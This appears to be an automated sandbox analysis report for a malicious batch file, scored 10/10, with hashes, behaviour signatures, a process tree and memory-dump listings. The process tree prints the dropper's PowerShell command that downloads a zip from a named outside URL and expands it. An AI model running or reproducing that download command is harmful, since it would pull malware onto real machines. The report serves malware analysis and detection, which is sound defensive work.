8992e6efcf8d972b9cddf644aea8c5ea29cb571c729029727eb08aa72c793c1c

Analysis

max time kernel
1610s
max time network
1616s
platform
windows7_x64
resource
win7-20230703-en
resource tags

arch:x64arch:x86image:win7-20230703-enlocale:en-usos:windows7-x64system
submitted
04/07/2023, 14:09

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

tesy6.bat
Size

700B
MD5

185a2d7bf8c479e47ed8e1ef2cffe6a3
SHA1

810436c92e9eb0c3ef0f6867e938b314f85f43c0
SHA256

e5aaa6de5373b002a54ae2cce47c384f11a80e66b03531b98e8eff1a8dd79581
SHA512

9f1fad5e2a66d6e3d8645ce6c4614fe65ccd169dfa7f78fa3ada228bd543fa7c3dadc384d839d063b66887207897226c57dc62bfb8458ba65614f153791c44bd

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://cdn.nest.rip/uploads/126d1e0b-e170-4964-b710-93ec152ec8c9.zip

Signatures

Blocklisted process makes network request 1 IoCs

flow	pid	Process
4	2176	powershell.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2176	powershell.exe
2856	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2176	powershell.exe
Token: SeDebugPrivilege	2856	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 2992 wrote to memory of 2176	2992	cmd.exe	29
PID 2992 wrote to memory of 2176	2992	cmd.exe	29
PID 2992 wrote to memory of 2176	2992	cmd.exe	29
PID 2992 wrote to memory of 2856	2992	cmd.exe	30
PID 2992 wrote to memory of 2856	2992	cmd.exe	30
PID 2992 wrote to memory of 2856	2992	cmd.exe	30

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\tesy6.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2992
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.nest.rip/uploads/126d1e0b-e170-4964-b710-93ec152ec8c9.zip', 'test.zip')"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2176
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "Expand-Archive -Path 'test.zip' -DestinationPath '.'"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2856

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
fb55a7045057a3b970da48f08e2fee9f

SHA1
fec03457d0ba6960464671189b55aad27e2c221e

SHA256
811d1d8a63136ce7f4a1ca62f78e4d5b6c1c5f1e65be5007b0d5760a2b70f63c

SHA512
f69c10e7ffa8cd00f8d1cb113d390056332769133d926cc2875cfaad240312f04bb9d397dd8a1c97e7075f3c219808a900e3502344449fc71cf1a8af568482a5

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZRW3STVYUP2GDYSNNSCD.temp

Filesize
7KB

MD5
fb55a7045057a3b970da48f08e2fee9f

SHA1
fec03457d0ba6960464671189b55aad27e2c221e

SHA256
811d1d8a63136ce7f4a1ca62f78e4d5b6c1c5f1e65be5007b0d5760a2b70f63c

SHA512
f69c10e7ffa8cd00f8d1cb113d390056332769133d926cc2875cfaad240312f04bb9d397dd8a1c97e7075f3c219808a900e3502344449fc71cf1a8af568482a5

Download Submit
memory/2176-62-0x00000000027F0000-0x0000000002870000-memory.dmp

Filesize
512KB

Download
memory/2176-58-0x000000001B210000-0x000000001B4F2000-memory.dmp

Filesize
2.9MB

Download
memory/2176-61-0x00000000027F0000-0x0000000002870000-memory.dmp

Filesize
512KB

Download
memory/2176-63-0x00000000027F0000-0x0000000002870000-memory.dmp

Filesize
512KB

Download
memory/2176-60-0x00000000027F0000-0x0000000002870000-memory.dmp

Filesize
512KB

Download
memory/2176-59-0x0000000001E00000-0x0000000001E08000-memory.dmp

Filesize
32KB

Download
memory/2856-70-0x000000001B170000-0x000000001B452000-memory.dmp

Filesize
2.9MB

Download
memory/2856-71-0x0000000002410000-0x0000000002418000-memory.dmp

Filesize
32KB

Download
memory/2856-72-0x0000000002440000-0x00000000024C0000-memory.dmp

Filesize
512KB

Download
memory/2856-73-0x0000000002440000-0x00000000024C0000-memory.dmp

Filesize
512KB

Download
memory/2856-74-0x0000000002440000-0x00000000024C0000-memory.dmp

Filesize
512KB

Download
memory/2856-75-0x000000000244B000-0x0000000002482000-memory.dmp

Filesize
220KB

Download